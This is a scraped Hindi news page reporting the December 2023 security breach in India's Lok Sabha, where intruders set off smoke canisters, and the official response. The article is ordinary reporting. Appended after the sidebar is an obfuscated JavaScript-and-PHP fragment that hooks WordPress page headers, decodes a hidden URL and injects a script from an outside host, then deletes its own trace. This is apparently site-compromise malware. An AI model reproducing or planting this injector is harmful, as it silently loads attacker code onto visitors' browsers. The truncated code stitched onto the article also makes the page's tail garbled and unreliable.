Tuesday, June 25, 2024
spot_img

भारतीय संसद में सुरक्षा उल्लंघन से चिंताएँ बढ़ीं

14December,2023


एक चौंकाने वाली घटना में, छह व्यक्तियों ने भारतीय संसद में एक बड़ा सुरक्षा उल्लंघन किया, जिससे सुरक्षा प्रणालियों की प्रभावशीलता पर सवाल उठने लगे। दो व्यक्तियों ने लोकसभा के अंदर धुएं के डिब्बे तैनात किए, जबकि दो अन्य ने बाहर धुएं के डिब्बे फोड़े। 22 साल पहले हुए आतंकी हमले की याद दिलाने वाला यह उल्लंघन सांसदों की सुरक्षा को लेकर चिंता पैदा करता है।

सागर शर्मा, डी मनोरंजन, नीलम देवी, अमोल शिंदे, ललित झा और विक्की शर्मा के रूप में पहचाने गए हमलावरों ने एक साथ घुसपैठ की योजना बनाई थी। प्रारंभिक जांच से पता चला कि दर्शक दीर्घा में बैठे शर्मा और मनोरंजन ने भाजपा सांसद प्रताप सिन्हा के कार्यालय से प्रवेश पास प्राप्त किया।

अपराधी, जो एक-दूसरे को चार साल से जानते थे, ने अपनी योजना के तहत संसद परिसर की भी टोह ली। हालांकि किसी भी आतंकवादी समूह द्वारा कट्टरपंथ का कोई सबूत नहीं है, यह घटना सुरक्षा प्रोटोकॉल की गहन जांच की आवश्यकता पर जोर देती है।

यह उल्लंघन लोकसभा में शून्यकाल सत्र के दौरान हुआ, जहां शर्मा ने पीला धुआं छोड़ने के बाद अध्यक्ष के आसन तक पहुंचने का प्रयास किया। सांसदों ने उस पर काबू पा लिया और उसे पकड़ लिया, जबकि उसके साथी मनोरंजन ने गैलरी में एक और धुआं कनस्तर से व्याकुलता पैदा कर दी। बाहर, देवी और शिंदे ने तानाशाही की निंदा करते हुए पीले और लाल धुएं के साथ कनस्तर फोड़े।

घटना के जवाब में, लोकसभा अध्यक्ष ओम बिरला ने व्यापक जांच पर जोर देते हुए सांसदों को उनकी सुरक्षा के बारे में आश्वस्त किया। गिरफ्तार किए गए व्यक्तियों, जिनमें उल्लंघन में मदद करने वाले लोग भी शामिल हैं, से दिल्ली पुलिस की आतंकवाद विरोधी सेल द्वारा पूछताछ की जा रही है।

यह उल्लंघन पुराने संसद भवन में आतंकवादी हमले के दो दशक बाद हुआ है, जिससे सीखे गए सबक और वर्तमान सुरक्षा उपायों की पर्याप्तता पर सवाल खड़े हो गए हैं। यह खालिस्तानी आतंकवादी गुरपतवंत सिंह पन्नून की हालिया धमकियों के बाद भी है, जिससे स्थिति की गंभीरता बढ़ गई है।

जैसे ही निचले सदन को अगले दिन तक के लिए स्थगित कर दिया गया, भारतीय संसद की समग्र सुरक्षा और भविष्य में ऐसी घटनाओं को रोकने के लिए एक मजबूत प्रतिक्रिया की आवश्यकता के बारे में चिंताएं बढ़ गईं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>